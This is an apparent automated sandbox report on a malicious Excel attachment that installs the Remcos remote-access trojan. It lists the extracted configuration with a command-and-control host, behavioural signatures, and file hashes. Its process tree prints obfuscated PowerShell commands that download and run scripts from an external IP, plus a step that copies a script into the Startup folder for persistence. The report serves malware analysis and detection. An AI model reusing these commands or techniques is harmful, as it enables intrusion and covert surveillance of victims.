Overview

overview

10

Static

static

8

CITIREMITT...CE.xls

windows7-x64

10

CITIREMITT...CE.xls

windows10-2004-x64

10

Analysis

  • max time kernel
    163s
  • max time network
    168s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220721-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-08-2022 06:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    CITIREMITTANCEADVICE.xls

  • Size

    119KB

  • MD5

    2057c566db6fb1532e9bee1cdab7f018

  • SHA1

    ac672abfc153fdabcbb1f1ffa149dc98e05e7c72

  • SHA256

    9b0ac9fff5a7bf388a5921f555f31d9d6004901b62ed0d1da9eb0b19e04cbc46

  • SHA512

    9e083e11b5fef981ce0234553ea8b61a0ccd264e03d6afab47242c6046e18bb665d24c5a604f7772dbf21ef3d6b0c0bb3bb70d16d08705a8b9e513ad3ef32df1

Score
10/10
remcosaugrat

Malware Config

Extracted

Family

remcos

Botnet

Aug

C2

topboysully.dvrlists.com:10171

Attributes
  • audio_folder

    MicRecords

  • audio_path

    %AppData%

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • install_path

    %AppData%

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    Aug-MR3KZU

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    Remcos

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 24 IoCs
    adwarespyware
  • Modifies registry class 3 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\CITIREMITTANCEADVICE.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Modifies registry class
    • NTFS ADS
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2692
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\afJNP.js"
      2⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2656
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.lhj\''+pmet:vne$,''sbv.tsorf/691.301.451.66//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\jhl.vbs');remove-item ($env:appdata + '\afJNP.js')
        3⤵
        • Blocklisted process makes network request
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4348
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\jhl.vbs"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:1408
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t0='QE150'.replace('Q','I').replace('150','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110110,00110110,00101110,00110001,00110101,00110100,00101110,00110001,00110000,00110011,00101110,00110001,00111001,00110110,00101111,01110110,01101001,01101110,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };([system.String]::Join('', $gf))|P
            5⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2364
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              6⤵
                PID:2992
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\Admin\AppData\Local\Temp\jhl.vbs' -Destination 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jhl.vbs'
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5080
    • C:\Program Files (x86)\Internet Explorer\ielowutil.exe
      "C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
      1⤵
        PID:4688
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
        1⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4792
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4792 CREDAT:17410 /prefetch:2
          2⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:3852

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      Privilege Escalation

      Defense Evasion

      Modify Registry

      1
      T1112

      Credential Access

      Discovery

      Query Registry

      3
      T1012

      System Information Discovery

      4
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        3KB

        MD5

        556084f2c6d459c116a69d6fedcc4105

        SHA1

        633e89b9a1e77942d822d14de6708430a3944dbc

        SHA256

        88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

        SHA512

        0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        5f63331227ca7a936f3f8e00a55e23f7

        SHA1

        f2d862ac9f687bcc563b726cd5afbaa5b8e55bc2

        SHA256

        c5555b383f8537fc41c39ea131d78bdb80228d6842f161accb1c94c3ea0e841d

        SHA512

        f6ab7b6d6b9c73c75512e09aac7ffb4fb787805d42ee7ffd35344874020e18226f2c108e8cdeffefe32b725324f8bff336847eaa80405c732cf0c45a15cb0bd2

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        454f9e7fa8aad19d6bac74d19b3086b2

        SHA1

        fd31e6cf15a019921faf239343ace0da3cfb06c2

        SHA256

        0f3226ebe6776806997c74f28e76ad5eb235909b8645d43d3564d823fc7834f2

        SHA512

        763af517762363994c0da1bbeef555ce4d8e7928b8dc9ece3aa90a24a232490f990c1948687957c55df2b010cc95c08267e4c5df48645739c70416c60a54840e

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\00f4c54f-fbb7-4a6e-83b1-3711c40641b3\AgileDotNetRT64.dll
        Filesize

        75KB

        MD5

        42b2c266e49a3acd346b91e3b0e638c0

        SHA1

        2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

        SHA256

        adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

        SHA512

        770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\jhl.vbs
        Filesize

        2KB

        MD5

        3a3bfb3ab5fa0e2aa5ad155f48af983f

        SHA1

        0f6a8151de1fe379960ba564ad7a649e25742eef

        SHA256

        d4a047e9050069db2d1bfba78082c935bb57b5b9f513f342da112a16805ae411

        SHA512

        898ad6c5c923e862fe1af1e5b25870fee5a59f0dbb948b2a2d42de769d6461654be928a9fcd1161383777d4e96af4e7553e4692ffc4c2b11083b2afc4a3a3b2a

        Download Submit
      • C:\Users\Admin\AppData\Roaming\afJNP.js
        Filesize

        1KB

        MD5

        f62b1ef0d290177e03b6d9bc2406223f

        SHA1

        5f324abbf52e3dbb3b88aa66d4f160f14bfe534d

        SHA256

        3cb928cf41db52f5a95c1e0191531fae10419a5706a671423ed61786e760b3bf

        SHA512

        2f455e10cdbe2972736d056180bb07ff3b157815fea85ba80bc06f185e249b25d73c525ef3378c89ab58ccc8873d1b8b60396d899a7eb516cd2f42cc68a5d352

        Download Submit
      • memory/1408-142-0x0000000000000000-mapping.dmp
        Download
      • memory/2364-160-0x00007FFDED380000-0x00007FFDEDE41000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/2364-152-0x00007FFDE63F0000-0x00007FFDE653E000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2364-150-0x00007FFDED380000-0x00007FFDEDE41000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/2364-145-0x0000000000000000-mapping.dmp
        Download
      • memory/2656-137-0x0000000000000000-mapping.dmp
        Download
      • memory/2692-135-0x00007FFDD4EE0000-0x00007FFDD4EF0000-memory.dmp
        Filesize

        64KB

        Download
      • memory/2692-136-0x00007FFDD4EE0000-0x00007FFDD4EF0000-memory.dmp
        Filesize

        64KB

        Download
      • memory/2692-166-0x00007FFDD7570000-0x00007FFDD7580000-memory.dmp
        Filesize

        64KB

        Download
      • memory/2692-165-0x00007FFDD7570000-0x00007FFDD7580000-memory.dmp
        Filesize

        64KB

        Download
      • memory/2692-164-0x00007FFDD7570000-0x00007FFDD7580000-memory.dmp
        Filesize

        64KB

        Download
      • memory/2692-134-0x00007FFDD7570000-0x00007FFDD7580000-memory.dmp
        Filesize

        64KB

        Download
      • memory/2692-133-0x00007FFDD7570000-0x00007FFDD7580000-memory.dmp
        Filesize

        64KB

        Download
      • memory/2692-163-0x00007FFDD7570000-0x00007FFDD7580000-memory.dmp
        Filesize

        64KB

        Download
      • memory/2692-130-0x00007FFDD7570000-0x00007FFDD7580000-memory.dmp
        Filesize

        64KB

        Download
      • memory/2692-132-0x00007FFDD7570000-0x00007FFDD7580000-memory.dmp
        Filesize

        64KB

        Download
      • memory/2692-131-0x00007FFDD7570000-0x00007FFDD7580000-memory.dmp
        Filesize

        64KB

        Download
      • memory/2992-153-0x0000000000400000-0x000000000047E000-memory.dmp
        Filesize

        504KB

        Download
      • memory/2992-154-0x0000000000431BE8-mapping.dmp
        Download
      • memory/2992-156-0x0000000000400000-0x000000000047E000-memory.dmp
        Filesize

        504KB

        Download
      • memory/2992-157-0x0000000000400000-0x000000000047E000-memory.dmp
        Filesize

        504KB

        Download
      • memory/2992-159-0x0000000000400000-0x000000000047E000-memory.dmp
        Filesize

        504KB

        Download
      • memory/2992-161-0x0000000000400000-0x000000000047E000-memory.dmp
        Filesize

        504KB

        Download
      • memory/4348-139-0x0000000000000000-mapping.dmp
        Download
      • memory/4348-140-0x00000242242B0000-0x00000242242D2000-memory.dmp
        Filesize

        136KB

        Download
      • memory/4348-141-0x00007FFDEDE00000-0x00007FFDEE8C1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/4348-144-0x00007FFDEDE00000-0x00007FFDEE8C1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/5080-149-0x00007FFDED380000-0x00007FFDEDE41000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/5080-146-0x0000000000000000-mapping.dmp
        Download